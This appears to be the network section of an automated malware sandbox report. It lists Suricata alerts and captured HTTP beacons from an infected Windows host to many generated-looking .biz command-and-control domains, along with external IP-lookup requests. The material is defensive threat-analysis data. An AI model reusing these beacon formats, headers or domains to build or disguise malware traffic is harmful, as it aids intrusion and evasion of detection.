                  Source: Network trafficSuricata IDS: 2018141 - Severity 1 - ET MALWARE Possible Compromised Host AnubisNetworks Sinkhole Cookie Value Snkz : 34.227.7.138:80 -> 192.168.2.22:49206
                  Source: Network trafficSuricata IDS: 2037771 - Severity 1 - ET MALWARE Possible Compromised Host AnubisNetworks Sinkhole Cookie Value btst : 34.227.7.138:80 -> 192.168.2.22:49206
                  Source: Network trafficSuricata IDS: 2037771 - Severity 1 - ET MALWARE Possible Compromised Host AnubisNetworks Sinkhole Cookie Value btst : 3.94.10.34:80 -> 192.168.2.22:49214
                  Source: Network trafficSuricata IDS: 2018141 - Severity 1 - ET MALWARE Possible Compromised Host AnubisNetworks Sinkhole Cookie Value Snkz : 47.129.31.212:80 -> 192.168.2.22:49195
                  Source: Network trafficSuricata IDS: 2037771 - Severity 1 - ET MALWARE Possible Compromised Host AnubisNetworks Sinkhole Cookie Value btst : 47.129.31.212:80 -> 192.168.2.22:49195
                  Source: Network trafficSuricata IDS: 2018141 - Severity 1 - ET MALWARE Possible Compromised Host AnubisNetworks Sinkhole Cookie Value Snkz : 34.246.200.160:80 -> 192.168.2.22:49204
                  Source: Network trafficSuricata IDS: 2037771 - Severity 1 - ET MALWARE Possible Compromised Host AnubisNetworks Sinkhole Cookie Value btst : 34.246.200.160:80 -> 192.168.2.22:49204
                  Source: Network trafficSuricata IDS: 2803274 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UH : 192.168.2.22:49166 -> 193.122.130.0:80
                  Source: Network trafficSuricata IDS: 2018141 - Severity 1 - ET MALWARE Possible Compromised Host AnubisNetworks Sinkhole Cookie Value Snkz : 13.251.16.150:80 -> 192.168.2.22:49196
                  Source: Network trafficSuricata IDS: 2037771 - Severity 1 - ET MALWARE Possible Compromised Host AnubisNetworks Sinkhole Cookie Value btst : 13.251.16.150:80 -> 192.168.2.22:49196
                  Source: Network trafficSuricata IDS: 2018141 - Severity 1 - ET MALWARE Possible Compromised Host AnubisNetworks Sinkhole Cookie Value Snkz : 18.246.231.120:80 -> 192.168.2.22:49217
                  Source: Network trafficSuricata IDS: 2037771 - Severity 1 - ET MALWARE Possible Compromised Host AnubisNetworks Sinkhole Cookie Value btst : 18.246.231.120:80 -> 192.168.2.22:49217
                  Source: global trafficHTTP traffic detected: POST /crs HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: pywolwnvd.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 808
                  Source: global trafficHTTP traffic detected: POST /xvuqxulkih HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: pywolwnvd.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 850
                  Source: global trafficHTTP traffic detected: POST /bjyjakehonafotkd HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: ssbzmoy.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 850
                  Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
                  Source: global trafficHTTP traffic detected: POST /mlvmnwk HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: cvgrf.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 850
                  Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
                  Source: global trafficHTTP traffic detected: POST /uxiijwub HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: npukfztj.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 850
                  Source: global trafficHTTP traffic detected: POST /of HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: przvgke.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 850
                  Source: global trafficHTTP traffic detected: GET /of?usid=20&utid=14164916598 HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Host: ww7.przvgke.biz
                  Source: global trafficHTTP traffic detected: POST /tbjnflaqienlofab HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: przvgke.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 850
                  Source: global trafficHTTP traffic detected: GET /tbjnflaqienlofab?usid=20&utid=14164917114 HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Host: ww7.przvgke.biz
                  Source: global trafficHTTP traffic detected: POST /dcbbaoyhlxdmix HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: knjghuig.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 850
                  Source: global trafficHTTP traffic detected: POST /mgjwfjfoigllfjqd HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: lpuegx.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 850
                  Source: global trafficHTTP traffic detected: POST /kieltrnsm HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: lpuegx.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 850
                  Source: global trafficHTTP traffic detected: POST /j HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: pywolwnvd.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 784
                  Source: global trafficHTTP traffic detected: POST /xatwldmnpl HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: ssbzmoy.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 784
                  Source: global trafficHTTP traffic detected: POST /agmftfyaknf HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: cvgrf.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 784
                  Source: global trafficHTTP traffic detected: POST /jy HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: npukfztj.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 784
                  Source: global trafficHTTP traffic detected: POST /vpav HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: przvgke.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 784
                  Source: global trafficHTTP traffic detected: GET /vpav?usid=20&utid=14164923657 HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Host: ww7.przvgke.biz
                  Source: global trafficHTTP traffic detected: POST /wqgsdflawiqut HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: przvgke.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 784
                  Source: global trafficHTTP traffic detected: GET /wqgsdflawiqut?usid=20&utid=14164923942 HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Host: ww12.przvgke.biz
                  Source: global trafficHTTP traffic detected: POST /mspai HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: knjghuig.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 784
                  Source: global trafficHTTP traffic detected: POST /m HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: lpuegx.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 784
                  Source: global trafficHTTP traffic detected: POST /savrhhv HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: vjaxhpbji.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 850
                  Source: global trafficHTTP traffic detected: POST /tehaooq HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: lpuegx.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 784
                  Source: global trafficHTTP traffic detected: POST /bqjjhsnkosjso HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: pywolwnvd.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 814
                  Source: global trafficHTTP traffic detected: POST /rgs HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: ssbzmoy.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 814
                  Source: global trafficHTTP traffic detected: POST /euichtddo HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: cvgrf.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 814
                  Source: global trafficHTTP traffic detected: POST /ka HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: npukfztj.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 814
                  Source: global trafficHTTP traffic detected: POST /bhikwfegywkkepu HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: przvgke.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 814
                  Source: global trafficHTTP traffic detected: GET /bhikwfegywkkepu?usid=20&utid=14164930459 HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Host: ww7.przvgke.biz
                  Source: global trafficHTTP traffic detected: POST /ayokafkcxduc HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: przvgke.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 814
                  Source: global trafficHTTP traffic detected: GET /ayokafkcxduc?usid=20&utid=14164930640 HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Host: ww12.przvgke.biz
                  Source: global trafficHTTP traffic detected: POST /yhhdkvr HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: vjaxhpbji.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 850
                  Source: global trafficHTTP traffic detected: POST /fekpygna HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: vjaxhpbji.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 784
                  Source: global trafficHTTP traffic detected: POST /wuwlkmskpl HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: xlfhhhm.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 850
                  Source: global trafficHTTP traffic detected: POST /uknkrwvskelclnbw HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: ifsaia.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 850
                  Source: global trafficHTTP traffic detected: POST /kskvulsy HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: saytjshyf.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 850
                  Source: global trafficHTTP traffic detected: POST /gsqrd HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: vcddkls.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 850
                  Source: global trafficHTTP traffic detected: POST /qdy HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: fwiwk.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 850
                  Source: global trafficHTTP traffic detected: GET /qdy?usid=20&utid=14164936400 HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Host: ww12.fwiwk.biz
                  Source: global trafficHTTP traffic detected: POST /lderrm HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: fwiwk.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 850
                  Source: global trafficHTTP traffic detected: GET /lderrm?usid=20&utid=14164936613 HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Host: ww7.fwiwk.biz
                  Source: global trafficHTTP traffic detected: POST /wua HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: tbjrpv.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 850
                  Source: global trafficHTTP traffic detected: POST /ivjxabsxpnamgnu HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: deoci.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 850
                  Source: global trafficHTTP traffic detected: POST /dwwujsrodteum HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: gytujflc.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 850
                  Source: global trafficHTTP traffic detected: POST /fmxntfwxlcjyow HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: gytujflc.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 850
                  Source: global trafficHTTP traffic detected: POST /ekhmfom HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: qaynky.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 850
                  Source: global trafficHTTP traffic detected: POST /qpqnetyp HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: vjaxhpbji.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 784
                  Source: global trafficHTTP traffic detected: POST /tgbpchottuabpqdq HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: bumxkqgxu.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 850
                  Source: global trafficHTTP traffic detected: POST /bcafsfattyjokwi HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: dwrqljrr.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 850
                  Source: global trafficHTTP traffic detected: POST /uihfupcxt HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: nqwjmb.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 850
                  Source: global trafficHTTP traffic detected: POST /qgbipxbu HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: ytctnunms.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 850
                  Source: global trafficHTTP traffic detected: POST /d HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: myups.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 850
                  Source: global trafficHTTP traffic detected: POST /cufth HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: myups.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 850
                  Source: global trafficHTTP traffic detected: POST /nqxton HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: oshhkdluh.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 850
                  Source: global trafficHTTP traffic detected: POST /vattrqg HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: yunalwv.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 850
                  Source: global trafficHTTP traffic detected: POST /egbl HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: yunalwv.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 850
                  Source: global trafficHTTP traffic detected: POST /njuvyxgvhb HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: jpskm.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 850
                  Source: global trafficHTTP traffic detected: POST /rmrhacpx HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: lrxdmhrr.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 850
                  Source: unknownHTTPS traffic detected: 104.21.80.1:443 -> 192.168.2.22:49168 version: TLS 1.0
                  Source: global trafficHTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
